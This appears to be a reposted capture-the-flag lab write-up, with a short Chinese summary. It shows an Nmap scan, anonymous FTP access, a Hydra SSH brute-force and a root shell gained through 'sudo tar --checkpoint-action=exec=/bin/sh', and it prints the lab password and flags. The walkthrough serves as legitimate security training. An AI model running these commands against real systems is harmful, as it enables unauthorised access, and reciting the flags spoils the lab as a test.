通过Nmap扫描发现目标服务器开放的端口后,利用FTP匿名登录获取用户名和密码列表,并使用Hydra进行SSH暴力破解成功登录。随后通过sudo tar命令提权获得root权限,并最终获取用户和root标志。 2025-9-1 05:52:41 Author: infosecwriteups.com(查看原文) 阅读量:14 收藏
Enumeration
As always, the first step is enumeration. I started with an Nmap scan:
nmap -p- -A -T4 10.10.81.15The results revealed three open ports:
- 21 (FTP)
- 22 (SSH)
- 80 (HTTP — Web Server)
FTP
From the scan results, FTP allowed anonymous login.
We can log in using:
ftp 10.10.81.15
Username: Anonymous
Password: (just press Enter)Inside, I found two files:
locks.txt→ A list of possible passwordstask.txt→ Notes mentioning some usernames
I downloaded both files using the get command for later use.
Brute-Forcing SSH
At this point, we had:
- A username list (from
task.txtand webpage content) - A password list (
locks.txt)
Perfect setup for brute-forcing SSH with Hydra:
hydra ssh://10.10.81.15 -L users.txt -P locks.txtSuccess 🎉 — valid credentials lin’s password! (RedDr4gonSynd1cat3)
SSH Access
Using the guessing credentials, I logged in via SSH:
ssh [email protected]And we’re in! (THM{CR1M3_SyNd1C4T3})
User Flag : Once inside, the user flag was easily accessible.
Privilege Escalation
To escalate privileges, I checked what the user could run as root:
sudo -lIt turned out the user had permission to run tar as root.
According to GTFOBins, tar can be exploited to gain root access. Running the following command:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shBoom 💥 — a root shell!
Root Flag (THM{80UN7Y_h4cK3r})
With root privileges, I grabbed the root flag. Mission accomplished 🚩
如有侵权请联系:admin#unsafe.sh